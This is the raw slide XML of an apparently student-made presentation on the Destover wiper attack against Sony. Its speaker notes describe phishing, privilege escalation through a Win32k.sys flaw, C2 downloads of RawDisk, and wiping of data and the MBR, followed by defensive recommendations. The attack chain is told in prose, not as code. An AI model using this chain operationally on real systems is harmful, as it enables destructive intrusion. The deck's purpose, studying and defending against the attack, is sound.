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lbert Sans Black"/>
      <p:bold r:id="rId17"/>
      <p:boldItalic r:id="rId18"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Albert Sans ExtraBold"/>
      <p:bold r:id="rId19"/>
      <p:boldItalic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bebas Neue"/>
      <p:regular r:id="rId21"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Albert Sans Light"/>
      <p:regular r:id="rId22"/>
      <p:bold r:id="rId23"/>
      <p:italic r:id="rId24"/>
      <p:boldItalic r:id="rId25"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Albert Sans"/>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bertSansExtraBold-boldItalic.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AlbertSansLight-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/BebasNeue-regular.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AlbertSansLight-italic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AlbertSans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bertSans-regular.fntdata"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AlbertSansLight-boldItalic.fntdata"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AlbertSans-italic.fntdata"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Albert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lbertSansBlack-bold.fntdata"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AlbertSansExtraBold-bold.fntdata"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AlbertSans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3154b4745a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3154b4745a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3154b4745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3154b4745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was researching Destover, I came to the conclusion that the hackers were really crafty and creative. There were a lot of moving parts, and the ways in which they were able to hack into Sony’s internal network suggest that the attackers spent a considerable amount of time performing reconnaissance prior to launching the attack.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 also found that there were lapses in Sony’s security, which by today’s standards may seem like obvious weak points.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3154b4745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3154b4745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Enhance authentication through multifactor authentication or the use of a AAA server (stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, authorization, and accounting framework)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RATs used by Sony had insecure authentication, credential-only authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>MFA could enhance authentication by adding more layers, verifying identity through multiple means</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>AAA servers such as RADIUS, TACACS+, or Kerberos would all be good choices</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Here is how an AAA server might be implemented…</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Introduce employee training policies to lower the chances of phishing attacks being successful</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Formal training sessions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spoofed phishing email from IT, see who bites</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Implement automation; intrusion prevention systems and data loss prevention systems would have been game changers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Automation is FAST; leave little time for Destover to spread</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Automated backups could have mitigated losses here (systems need replacing, but at least we have our files)</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Other general tactics:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ALWAYS keep systems up to date CVE-2014-4113, Windows vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>security audits with MSPs (RawDisk)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3154b4745a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3154b4745a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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>redentials through phishing, remote access tools only checked for credentials (no MFA or anything)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Blank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initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> attack vector in this scenario was phishing. Attackers sent malicious links to Sony employees’ emails, which were designed to steal their login credentials. Unfortunately for Sony, some of their remote access tools, or RATs, used credential-only authentication, meaning that the attackers could simply use stolen employee login information to remote in to devices on Sony’s internal network.</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Once the attackers stole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and logged in to an internal device, they installed a file called diskpartmg16.exe, which I will refer to as dropper.exe.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f87378d8f8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f87378d8f8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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ertain user-mode objects like windows or buttons use kernel-mode pointers stored in Win32k.sys</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ayload.exe runs app that manipulates Win32k.sys pointers out of bounds</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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>xtract security tokens, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> enable different levels of access control (go for admin level)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nce this payload runs on a system…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>t achieves admin level privileges…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>hich it uses to connect to neighboring systems…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nd infect those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Destover was established on some of Sony’s internal devices, its next step was to deploy the destructive payload. This payload took the form of a file called igfxtray.exe, which I will refer to as payload.exe. This file was dropped from dropper.exe, and its purpose was to take advantage of a vulnerability in the Windows OS, now referred to as CVE… A Windows OS file called Win32k.sys contained kernel-mode pointers, which were used by user-made objects like windows or buttons in applications. The vulnerability was that these pointers could be subtly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>manipulated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in ways that would cause them to point to out-of-bounds memory. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> careful design, payload.exe launched a malicious program that manipulated these kernel-mode pointers to point at secure access tokens, which it then read and stored. These secure access tokens, when associated with a user account, determined the level of access. Therefore, Destover was able to attach the admin token to its current user, thus achieving administrator privileges.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to #3</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f87378d8f8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f87378d8f8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lssvr.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> establishes connection with C2 server via port 80. Once devices on the internal network have been compromised…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>issvr.exe establishes that connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attackers use a system of VPNs and proxies to communicate with C2 server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Infected computers download additional files INCLUDING RAWDISK from C2, requesting with encoded powershell commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Here is an example: web request, c2 server URI, encoded command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f87378d8f8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f87378d8f8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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> escalation allows Destover to disable core systems with ease. The objective of this malware is to completely wipe everything with no chance of recovery.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Delete AV and anything else that could potentially get in the way</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable recovery options</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leave no trace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2f87378d8f8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2f87378d8f8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RawDisk was third party software that allowed direct access to local memory; downloaded from C2 server, used to wipe data</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MBR was included in the wiping process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Here is an example system that was infected by Destover. You’ve got user files, system/OS files, and the MBR.</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All of the data is exfiltrated through the connection that was created by lissvr.exe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RawDisk is used to overwrite entire system with random, garbage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this point, it was time for the wiping process to begin. RawDisk, which I briefly referred to earlier, was one of the resources that compromised systems requested from the C2 server. RawDisk was third party software used by the IT team to thoroughly wipe storage drives. Common scenarios would have been a device being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>decommissioned or an employee who is leaving the company that had some company-owned device. Because it was a trusted application, no flags were raised when it was installed on other employees’ devices. Thus, this was the perfect tool for Destover to use to wipe out everything. With direct access to local memory, Destover wiped out everything including user files and system and OS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master boot record, or MBR, was also included in this wiping. A device’s MBR is crucial; without it, a device doesn’t know which drive to boot from, rendering it completely unusable.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to #3</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f87378d8f8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f87378d8f8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The final step was to manipulate the MBR to show a bitmap image when the wiped system was booted up.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3154b4745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3154b4745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that picture in more detail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429125" y="-24300"/>
            <a:ext cx="2714875" cy="5167749"/>
            <a:chOff x="6429125" y="-24300"/>
            <a:chExt cx="2714875" cy="5167749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Google Shape;10;p2"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7747050" y="-24300"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Google Shape;11;p2"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429125" y="2578675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;12;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396950" y="1518125"/>
            <a:ext cx="6350100" cy="1564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400">
                <a:latin typeface="Albert Sans ExtraBold"/>
                <a:ea typeface="Albert Sans ExtraBold"/>
                <a:cs typeface="Albert Sans ExtraBold"/>
                <a:sym typeface="Albert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2307675" y="3149575"/>
            <a:ext cx="45288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4" name="Google Shape;14;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Google Shape;15;p2"/>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16" name="Google Shape;16;p2"/>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17" name="Google Shape;17;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="4442730"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Google Shape;18;p2"/>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 name="Google Shape;22;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="123628" y="6"/>
            <a:ext cx="261257" cy="5143447"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;23;p2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18339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504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17200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221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489"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 name="Google Shape;36;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7044690" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Google Shape;37;p2"/>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9" name="Shape 249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
